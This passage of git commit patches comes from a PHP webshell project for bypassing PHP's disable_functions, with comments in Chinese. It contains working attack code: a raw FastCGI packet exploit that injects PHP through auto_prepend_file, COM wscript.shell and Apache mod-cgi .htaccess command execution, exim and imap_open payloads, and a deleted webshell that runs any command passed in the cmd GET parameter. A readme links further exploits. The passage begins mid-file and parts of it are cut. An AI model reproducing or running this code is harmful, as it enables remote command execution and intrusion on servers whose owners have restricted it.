':143/imap}INBOX', '', ''); + return recv_result($cmd_arr[1]); + }else{ + return FAILURE; + } +} + +//echo imap_open_exec("id"); + +/* + * exim + */ + +//function exim_exec($cmd){ +// if (function_exists('mail')) { +// $cmd_arr = send_cmd_to_file($cmd); +// $payload = "-be \${run{/bin/bash\${substr{10}{1}{\$tod_log}}".$cmd_arr[0]."}{ok}{error}}"; +// mail("a@localhost", "", "", "", $payload); +// return recv_result($cmd_arr[1]); +// }else{ +// return FAILURE; +// } +//} + +/* + * Imagick类, 选择更加通用的绕过方式吧 + */ + +//function imagick_exec($cmd){ +// if(class_exists('Imagick')){ +// $imagick_file = WRITE_DIR . 'img'; +// +// $cmd_arr = send_cmd($cmd); +// +// $exploit = <<readImage("$imagick_file"); +// $thumb->writeImage(WRITE_DIR . 'tmp'); +// $thumb->clear(); +// $thumb->destroy(); +// +// return recv_result($cmd_arr[1]); +// }else{ +// return 'nonono'; +// } +//} + + +/* + * FastCgi: + * 9000 port + * phpx.x-fpm.sock + * + * Fail: windows + */ + +function p($ptr){ + return bin2hex(chr($ptr)); +} + +function pnv($len){ + if($len < 128){ + return p($len); + }else{ + return p(($len >> 24) |0x80) . p(($len >> 16) & 0xFF) . p(($len >> 8) & 0xFF) . p($len & 0xFF); + } +} + +// 还需要更改具体的fastcgi参数, 目前能在linux下使用 +//$host = 'unix:///run/php/php7.3-fpm.sock'; +function fastcgi_exec($cmd, $file, $host, $port=9000){ + if (strlen($cmd) > 40) { + echo "Bug: command len need < 40, will be fix."; + } + + $cmd = base64_encode($cmd); + $php_code = ''; + + $php_code_len = strlen($php_code); + $php_code_pad = p(($php_code_len >> 8) & 0xFF) . p($php_code_len & 0xFF) . p(0) . 
p(0); + + //$uri = bin2hex(__FILE__); + //$uri = '/var/www/html/shell.php'; + $uri = $file; + $uri_val_pad = pnv(strlen($uri)); + + $params = '0e02434f4e54454e545f4c454e475448'.bin2hex($php_code_len).'0c10434f4e54454e545f545950456170706c69636174696f6e2f746578740b0452454d4f54455f504f5254393938350b095345525645525f4e414d456c6f63616c686f7374110b474154455741595f494e54455246414345466173744347492f312e300f0e5345525645525f534f4654574152457068702f66636769636c69656e740b0952454d4f54455f414444523132372e302e302e310f'.$uri_val_pad.'5343524950545f46494c454e414d45'.bin2hex($uri).'0b'.$uri_val_pad.'5343524950545f4e414d45'.bin2hex($uri).'091f5048505f56414c55456175746f5f70726570656e645f66696c65203d207068703a2f2f696e7075740e04524551554553545f4d4554484f44504f53540b025345525645525f504f525438300f085345525645525f50524f544f434f4c485454502f312e310c0051554552595f535452494e470f165048505f41444d494e5f56414c5545616c6c6f775f75726c5f696e636c756465203d204f6e0d01444f43554d454e545f524f4f542f0b095345525645525f414444523132372e302e302e310b'.$uri_val_pad.'524551554553545f555249'.bin2hex($uri); + $params_len = strlen(hex2bin($params)); + $params_pad = p(($params_len >> 8) & 0xFF) . p($params_len & 0xFF) . p(0) . 
p(0); + + $fastcgi_data = '01017b0700080000000100000000000001047b07'.$params_pad.$params.'01047b070000000001057b07'.$php_code_pad.bin2hex($php_code).'01057b0700000000'; + + $result = send_socket(hex2bin($fastcgi_data), $host, $port); +// if($result != FAILURE){ +// $start = md5("s");; +// $end = md5("e");; +// $input = $result; +// $result = substr($input, strlen($start)+strpos($input, $start),(strlen($input) - strpos($input, $end))*(-1)); +// } + return $result; +} + +//var_dump(fastcgi_exec("id",'/var/www/html/shell.php' , '127.0.0.1', 9002)); +//echo fastcgi_exec("id",'/var/www/html/ant.php' , 'unix:///run/php/php7.3-fpm.sock'); +//var_dump(fastcgi_exec("whoami",'C:\\phpstudy2018\\PHPTutorial\\WWW\test\\apache\\1.php' , '127.0.0.1', 9000)); + +/* + * COM执行: 仅限windows + * work on: + * php 5.4.45 + * + * ******* + * fail: + * > php 5.5.38 + * + */ + +function com_exec($cmd){ + $cmd = "cmd.exe /c ".$cmd; + $cmd_arr = send_cmd($cmd); + + echo "执行时候会黑框, 需要时间; 如果有延时命令执行的时候特别需要注意一下。"; + + $wscript = new COM('wscript.shell'); + $wscript->Run($cmd_arr[0]); + + sleep(1); + return recv_result($cmd_arr[1]); +} + +//echo com_exec($_GET['cmd']); + +/* + * Apache mod-cgi: Windows && Linux + * 需要保证一个web目录可写可访问 + * + * 注意备份htaccess + */ + +function apache_cgi_exec($cmd, $dir='.'){ + echo "由于是系统调用cmd执行后命令,会有一些延迟。请新建目录执行, 以免htaccess出问题导致本身shell不可访问。"; + // check +// if(!in_array('mod_cgi', apache_get_modules()) && !empty($_SERVER['HTACCESS']) && is_writable($dir)){ +// return FAILURE; +// } + + $cmd_arr = send_cmd($cmd); + if(OS == "Windows") { + $shell_file = "bye.bat"; + $htaccess = "ScriptInterpreterSource Registry-Strict\nAddHandler cgi-script .bat\nOptions +ExecCGI +FollowSymlinks"; + + $cmd_arr[0] = escapeshellcmd($cmd_arr[0]); + $content = "@echo off\necho Content-Type: text/html\nfor /F %%i in ('$cmd_arr[0]') do ( set result=%%i)"; + } else { + $shell_file = "1.bylinux"; + $htaccess = "Options +ExecCGI\nAddHandler cgi-script .bylinux"; + $content = "#!/bin/bash\necho 
\"Content-Type: text/html\\n\\n\"\n" . $cmd_arr[0]; + } + + write_file('.htaccess', $htaccess); + write_file($shell_file, $content); + + echo ""; + sleep(1); + echo recv_result($cmd_arr[1]); +} + +//echo apache_cgi_exec($_GET['cmd']); + + +echo << +$disable_function_str

+ +Vulable Function:
+$vul_function_str

+ +Open Basedir:
+$open_basedir

+ +
+ execpath:

+ command:

+ writeable dir:

+

+
+ +EOF; + +//echo $_POST["cmd"]; + + +?> + diff --git a/test.php b/test.php new file mode 100644 index 0000000..ccda4df --- /dev/null +++ b/test.php @@ -0,0 +1,7 @@ + Date: Tue, 18 Jun 2019 11:23:05 +0800 Subject: [PATCH 11/16] Delete bypass.php del --- bypass.php | 70 ------------------------------------------------------ 1 file changed, 70 deletions(-) delete mode 100644 bypass.php diff --git a/bypass.php b/bypass.php deleted file mode 100644 index 4ccd481..0000000 --- a/bypass.php +++ /dev/null @@ -1,70 +0,0 @@ - $func enable", 1); - } - } -} else { - msg("disable_functions none !!!", 1); -} -function msg($text, $type = 0) { - - $def = "[*]"; - $color = "green"; - if ($type == 1) { - - $def = "[+]"; - $color = "red"; - } else if ($type == -1) { - - $def = "[-]"; - } - echo "$def $text
"; -} - -function Exec_Run($cmd) { - $res = ''; - if (function_exists('exec')) { - @exec($cmd, $res); - $res = join("\n", $res); - } elseif (function_exists('shell_exec')) { - $res = @shell_exec($cmd); - } elseif (function_exists('system')) { - @ob_start();@system($cmd); - $res = @ob_get_contents(); - @ob_end_clean(); - } elseif (function_exists('passthru')) { - @ob_start(); - @passthru($cmd); - $res = @ob_get_contents(); - @ob_end_clean(); - } elseif (@is_resource($f = @popen($cmd, "r"))) { - $res = ''; - while (!@feof($f)) {$res .= @fread($f, 1024);} - @pclose($f); - } - return $res; -} -function Exec_g() { - $res = '回显'; - $cmd = 'whoami'; - if (!empty($_GET['cmd'])) { - $cmd = $_GET['cmd']; - } - $res = Exec_Run($cmd); - print << - command >> {$cmd} - {$res} - -END; -} -Exec_g(); From dbf06972195f3a1ab1a63fae822ecea28a6b0716 Mon Sep 17 00:00:00 2001 From: l3m0n Date: Tue, 18 Jun 2019 11:23:17 +0800 Subject: [PATCH 12/16] Delete ant.php del --- ant.php | 7 ------- 1 file changed, 7 deletions(-) delete mode 100644 ant.php diff --git a/ant.php b/ant.php deleted file mode 100644 index c7fe53f..0000000 --- a/ant.php +++ /dev/null @@ -1,7 +0,0 @@ - Date: Tue, 18 Jun 2019 11:23:26 +0800 Subject: [PATCH 13/16] Delete test.php del --- test.php | 7 ------- 1 file changed, 7 deletions(-) delete mode 100644 test.php diff --git a/test.php b/test.php deleted file mode 100644 index ccda4df..0000000 --- a/test.php +++ /dev/null @@ -1,7 +0,0 @@ - Date: Tue, 18 Jun 2019 11:29:42 +0800 Subject: [PATCH 14/16] add paper dir --- paper/readme.old.md | 77 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 77 insertions(+) create mode 100644 paper/readme.old.md diff --git a/paper/readme.old.md b/paper/readme.old.md new file mode 100644 index 0000000..64a5ded --- /dev/null +++ b/paper/readme.old.md 
@@ -0,0 +1,77 @@ +# Bypass_Disable_functions_Shell +一个各种方式突破Disable_functions达到命令执行的shell + +### 防御 +dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,mb_send_mail,putenv,ini_set,apache_setenv,symlink,link + +### 功能 +##### imap_open bypass +https://antichat.com/threads/463395/#post-4254681 + +##### 利用环境变量LD_PRELOAD来绕过 + +http://drops.wooyun.org/tips/16054 + +##### ImageMagick绕过 + +http://drops.wooyun.org/papers/15589 + +https://www.exploit-db.com/exploits/39766/ + +##### imagecreatefromgd2 + +https://github.com/l3m0n/exploits/tree/master/CVE-2016-3074 + +##### test + +https://github.com/l3m0n/exploits/tree/master/CVE-2016-3078 + +##### PHP OPcache + +http://www.myhack58.com/Article/html/3/62/2016/74160.htm + +http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/ + +##### mail函数 + +https://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html + +https://www.exploit-db.com/exploits/35146/ + +##### 利用pcntl_exec突破 + +http://www.cnseay.com/2632/comment-page-1/ + +``` +#exec.php + +#/tmp/b4dboy.sh +#!/bin/bash +ls -l / +``` + +##### 破壳bash漏洞 + +##### dl + +https://www.exploit-db.com/docs/38104.pdf + +##### PHP 5.x - COM functions safe_mode and disable_function bypass + +https://www.exploit-db.com/exploits/4553/ + +https://www.exploit-db.com/exploits/4517/ + +##### win_shell_execute + +https://www.exploit-db.com/exploits/4218/ + +##### Bypass PHP system functions disabled via mod_cgi + +http://0cx.cc/bypass_disabled_via_mod_cgi.jspx + +##### mail的exim扩展bypass +http://www.cnblogs.com/iamstudy/articles/Exim_mail_bypass_disable_function.html + + + From 7de51d22aaee5ca2777b7b703a9625d84c44631a Mon Sep 17 00:00:00 2001 From: l3m0n Date: Tue, 18 Jun 2019 11:32:02 +0800 Subject: [PATCH 15/16] add old doc --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index a312b07..a59c4a3 100644 --- a/README.md +++ b/README.md 
@@ -1,5 +1,7 @@ # Bypass Disable Functions Shell +项目旧文档已迁移到[此处](https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/paper/readme.old.md) + 禁用函数列表(希望能做最全的禁用列表,也可以用此做对比进行绕过): ``` From f4f0075bdec9a8c18c04e0ffdc0c958582b20526 Mon Sep 17 00:00:00 2001 From: l3m0n Date: Tue, 18 Jun 2019 11:38:43 +0800 Subject: [PATCH 16/16] add bypass method --- README.md | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a59c4a3..29a5054 100644 --- a/README.md +++ b/README.md @@ -8,6 +8,14 @@ dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link ``` +shell绕过已实现的方式: +- 常规绕过: exec、shell_exec、system、passthru、popen、proc_open +- ld_preload绕过: mail、imap_mail、error_log、mb_send_mail +- pcntl_exec +- imap_open +- fastcgi +- com +- apache mod-cgi 目录结构: - env - docker环境, 用于测试各类绕过exp @@ -16,5 +24,3 @@ dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,ima - -